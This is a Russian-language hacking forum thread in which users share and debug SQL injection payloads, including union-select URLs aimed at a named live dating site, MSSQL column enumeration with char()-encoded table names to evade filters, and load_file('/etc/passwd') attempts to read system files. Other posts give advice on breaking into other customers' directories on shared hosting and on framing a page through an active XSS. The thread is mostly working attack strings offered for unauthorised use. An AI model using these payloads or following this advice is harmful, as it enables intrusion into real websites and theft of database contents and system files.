Вставлю свои 5 копеек... http://www.freeukdatingsite.com/imagePop.asp?Item=@@version http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+union+select+null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null Напридумывали каких-то фильтров) зы. Может я слишком плоско мыслью, но я не понимаю, зачем писать попробуй то..сё, если человек отписал с урл...
Имею доступ к phpmyadmin. На сервер установлен форум phpbb, можно ли как то управлять коталогом / из под рут
Всем привет! Интересует вопрос, какие способы есть в шаред хостингах для просмотра каталога(или файла), других пользователей например: /home/andrei/public_html/ /home/irina/public_html/ бывает часто что я не имею права на просмотр каталога и все то что внутри,
Я так понял, что ты тоже зареган на подобном серваке и можешь работать токо в своей директории. Наверно и консолька есть... Просмотр директорий других юзеров ты можешь добиться: 1) повышением прав на этом серваке, если найдешь соответствующий эксплоит под данную систему; 2) т.к. это web-хостинг, то можно попытаться взломать сайты хостящиеся здесь же; 3) если есть подключения к бд, то проверить возможность чтения файлов через load_file. пока больше на ум ничего не приходит
ребят делаю запрос (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')-- результат Ligne 1 : syntaxe incorrecte vers ')'. делаю (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,114,111,117,112,95,97,100,109,105,110))-- результат a fonction char requiert 1 arguments. (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f61646d696e)-- syntaxe incorrecte vers ')' что посоветуете?
Есть сайт, делаю запрос: http://test/news.php?id=-1+union+select+1,user(),3,4-- Выводит: [email protected] Хочу узнать права на чтение/запись файлов, делаю запрос: http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+where+user='adeoo3'-- Выводит: SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user' Что это значит???
Нетдоступа к таблице майск.юсер, попробуй перечитапть файл через load_file или залить в /tmp и перечитать оттуда.
надо так: (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bchar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar(111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97)%2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран? p.s. С помощью этого <iframe src=//сайт>
http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4-- не катит. Значит у меня однозначно нет прав?
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(108)+char(95)+char(103)+char(114)+char(111)+char(117)+char(112)+char(95)+char(97)+char(100)+char(109)+char(105)+char(110))--
2 pinch (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(108)+char(95)+char(103)+char(114)+char(111)+char(117)+char(112)+char(95)+char(97)+char(100)+char(109)+char(105)+char(110))-- syntaxe incorrecte vers 'char'.
